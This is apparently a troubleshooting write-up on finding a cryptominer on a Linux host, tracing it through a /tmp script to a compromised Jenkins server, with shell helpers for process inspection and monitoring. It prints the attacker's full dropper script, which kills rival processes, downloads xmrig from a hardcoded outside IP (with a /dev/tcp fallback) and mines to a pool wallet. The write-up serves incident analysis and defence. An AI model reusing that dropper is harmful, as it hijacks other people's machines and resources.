Troubleshooting an Abnormal Process on Linux

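  1. We received reports that the website was slow. A look at top showed one process using a large share of the server's resources (183.4% CPU, i.e. almost two full cores, and 2.0 GB of resident memory):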

      PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
    29575 root      10 -10 2951860   2.0g   1960 S 183.4 26.7  10943:12 trace
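
For a one-shot, non-interactive view of the heaviest processes (useful in scripts or when pasting evidence into a ticket), ps can sort by CPU instead of running top interactively. A minimal sketch, assuming procps-ng ps as shipped on mainstream Linux distributions; top_cpu is a hypothetical helper name:

```shell
#!/usr/bin/env bash
# top_cpu [N]: print the ps header plus the N processes with the highest %CPU.
# Assumes procps-ng ps; other ps implementations may not support --sort.
top_cpu() {
    local n="${1:-10}"
    # procps computes %cpu as CPU time divided by elapsed time since the
    # process started, i.e. a lifetime average rather than top's live value.
    ps -eo pid,ppid,user,%cpu,%mem,etime,args --sort=-%cpu | head -n "$((n + 1))"
}
```

Usage: top_cpu 5 (it defaults to 10 rows). Because the figure is a lifetime average, top remains the better tool for the current load.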
    
  2. Look up the process that is consuming the resources

    Command: ps -f -p 29575

    Output:

    [root@localhost ~]# ps -f -p 29575
    UID        PID  PPID  C STIME TTY          TIME CMD
    root     29575 29554 99 1124 ?      7-12:44:20 ./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 100 --cpu-priority 3 --print-time 25 --threads 2 --url auto.c3pool.org:13333 --user 83dxgsjgbnM
    

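    The arguments give it away: seeing --max-cpu-usage 100 is enough to tell this is up to no good, and --url auto.c3pool.org:13333 points it at a cryptocurrency mining pool.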
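
The ps output above stops at --user 83dxgsjgbnM, so the rest of the command line is missing; ps typically trims its output to the terminal width. procps ps accepts -ww for unlimited width (ps -ww -f -p 29575), or the arguments can be read straight from /proc, where the kernel stores them NUL-separated. A minimal sketch of the latter; full_cmdline is a hypothetical helper name:

```shell
#!/usr/bin/env bash
# full_cmdline PID: print a process's complete argument list on one line.
# /proc/PID/cmdline holds argv as NUL-separated strings and is not limited
# by terminal width.
full_cmdline() {
    local pid="$1" args
    # Fails (status 1) if the process does not exist or has already exited.
    args=$(tr '\0' ' ' 2>/dev/null < "/proc/$pid/cmdline") || return 1
    # Drop the trailing space left by the final NUL.
    printf '%s\n' "${args% }"
}
```

Usage: full_cmdline 29575.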

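  3. Find the parent process with ps -f -p 29554, then repeat on its parent. The chain runs from the miner to a bash script in /tmp, and from there to the Jenkins server (java -jar /usr/local/jenkins.war --httpPort=8083), whose parent is PID 1: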

    [root@localhost ~]# ps -f -p 29554
    UID        PID  PPID  C STIME TTY          TIME CMD
    root     29554 32494  0 1124 ?      00:00:00 /bin/bash /tmp/jenkins1137544342535481679.sh
    [root@localhost ~]# ps -f -p 32494
    UID        PID  PPID  C STIME TTY          TIME CMD
    root     32494     1  0 1124 ?      00:19:04 java -jar /usr/local/jenkins.war --httpPort=8083
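
Following PPIDs one ps call at a time, as above, is easy to automate. A minimal sketch that reads the PPid: field of /proc/PID/status repeatedly until it reaches 0; proc_ancestry is a hypothetical helper name. Where psmisc is installed, pstree -s -p 29575 shows a similar chain.

```shell
#!/usr/bin/env bash
# proc_ancestry PID: walk from PID up through its ancestors, printing one
# "<pid> <command line>" line per process, until the parent PID is 0
# (or a process in the chain has already exited).
# Reads /proc directly, so it needs Linux procfs but not ps.
proc_ancestry() {
    local pid="$1" ppid args
    while [ "$pid" -gt 0 ] && [ -r "/proc/$pid/status" ]; do
        # argv is NUL-separated in procfs; join it with spaces.
        args=$(tr '\0' ' ' 2>/dev/null < "/proc/$pid/cmdline")
        printf '%s %s\n' "$pid" "${args% }"
        # The "PPid:" line of /proc/PID/status holds the parent's PID.
        ppid=$(awk '/^PPid:/ {print $2}' "/proc/$pid/status" 2>/dev/null)
        pid="${ppid:-0}"
    done
}
```

On the host above, proc_ancestry 29575 would be expected to list 29575 (trace), 29554 (the /tmp script), 32494 (java -jar /usr/local/jenkins.war) and finally PID 1.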
    
  4. Examine the script

    1. cat /tmp/jenkins1137544342535481679.sh

      #!/bin/bash
      
      ps aux | grep -v grep | grep -v "java\|redis\|weblogic\|mongod\|mysql\|oracle\|b52e75408\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh"| awk "{if($3>60.0) print $2}" | xargs -I % kill -9 %
      
      if [[ $(whoami) != "root" ]]; then
          for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do
              kill -9 $tr || : ;
          done;
      fi
      
      threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
      hostHash=$(hostname -f | md5sum | cut -c1-8);
      echo "${hostHash} - ${threadCount}";
      
      _curl () {
        read proto server path <<<$(echo ${1//// })
        DOC=/${path// //}
        HOST=${server//:*}
        PORT=${server//*:}
        [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
      
        exec 3<>/dev/tcp/${HOST}/$PORT
        echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
        (while read line; do
         [[ "$line" == $'\r' ]] && break
        done && cat) <&3
        exec 3>&-
      }
      
      rm -rf config.json;
      
      d () {
            curl -L --insecure --connect-timeout 5 --max-time 40 --fail $1 -o $2 2> /dev/null || wget --no-check-certificate --timeout 40 --tries 1 $1 -O $2 2> /dev/null || _curl $1 > $2;
      }
      
      test ! -s trace && \
          d http://118.189.172.141:8080/novoCRM/static/xmrig-6.4.0-linux-x64.tar.gz trace.tgz && \
          tar -zxvf trace.tgz && \
          mv xmrig-6.4.0/xmrig trace && \
          rm -rf xmrig-6.4.0 && \
          rm -rf trace.tgz;
      
      test ! -x trace && chmod +x trace;
      
      k() {
          ./trace \
              -r 2 \
              -R 2 \
              --keepalive \
              --no-color \
              --donate-level 1 \
              --max-cpu-usage 100 \
              --cpu-priority 3 \
              --print-time 25 \
              --threads ${threadCount:-4} \
              --url $1 \
              --user 83dxgsjgbnMN7Ej6GfCZMsfHYD3NYdozAhm7DjyTme6jTYPaJ8AQeEyMGKLRL1LjqXVSVBJgU3moYUECZjWUAkTi8rxSNZW \
              --pass elf2 \
              --keepalive
      }
      
      k auto.c3pool.org:13333
      
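    2. The core of the script is the trace command, the real culprit behind the resource usage; it is the xmrig 6.4.0 binary that the script downloads and renames. Running lsof -p 29554 on the parent shell reveals the directory it runs in: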

      /root/.jenkins/workspace/UpdateJenkins
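
lsof -p lists every open file of the process; adding -a -d cwd (lsof -a -p 29554 -d cwd) narrows the output to the working directory. The same information is available from /proc without lsof. A minimal sketch; proc_location is a hypothetical helper name, and it needs to run as the same user as the target or as root:

```shell
#!/usr/bin/env bash
# proc_location PID: show where a process runs from, without lsof.
proc_location() {
    local pid="$1"
    # cwd: the process's current working directory (lsof lists it as "cwd").
    printf 'cwd: %s\n' "$(readlink "/proc/$pid/cwd")"
    # exe: the binary actually executing; the kernel appends " (deleted)"
    # if that file has been removed since the process started.
    printf 'exe: %s\n' "$(readlink "/proc/$pid/exe")"
}
```

Since the script starts the miner as ./trace, proc_location 29575 would be expected to report the same workspace directory as its cwd. The path follows Jenkins' default layout, $JENKINS_HOME/workspace/<job name>, with JENKINS_HOME defaulting to ~/.jenkins (here /root/.jenkins), so UpdateJenkins is most likely the name of the Jenkins job that ran the script and is worth inspecting.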

  5. Remediation:

    1. Kill the process and delete the malicious script /tmp/jenkins1137544342535481679.sh
    2. Download a fresh jenkins.war from the official site
    3. Keep monitoring
    4. revenge
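
Step 3 (keep monitoring) can be partly scripted by scanning running processes for the indicators seen in this incident. A minimal sketch; the pattern list in SUSPICIOUS_PATTERNS is hypothetical and contains only strings from this write-up (the pool host, the xmrig name and its --donate-level option, and the /tmp/jenkins<digits>.sh script name), so it will not catch a miner that uses different names:

```shell
#!/usr/bin/env bash
# Hypothetical indicator list (extended regex), built only from strings
# seen in this incident.
SUSPICIOUS_PATTERNS='c3pool|xmrig|--donate-level|/tmp/jenkins[0-9]+\.sh'

# is_suspicious_cmdline STRING: succeed if STRING matches any indicator.
is_suspicious_cmdline() {
    printf '%s\n' "$1" | grep -Eq -- "$SUSPICIOUS_PATTERNS"
}

# scan_processes: print "<pid> <command line>" for every matching process.
scan_processes() {
    local dir pid args
    for dir in /proc/[0-9]*; do
        pid="${dir#/proc/}"
        # The process may exit between the glob and the read; skip it if so.
        args=$(tr '\0' ' ' 2>/dev/null < "$dir/cmdline") || continue
        # Kernel threads have an empty cmdline.
        [ -n "$args" ] || continue
        if is_suspicious_cmdline "$args"; then
            printf '%s %s\n' "$pid" "${args% }"
        fi
    done
}
```

Usage: scan_processes prints nothing when no process matches. Run from cron, for example, any output can be treated as an alert; pairing it with a check on overall CPU usage covers miners that use other names.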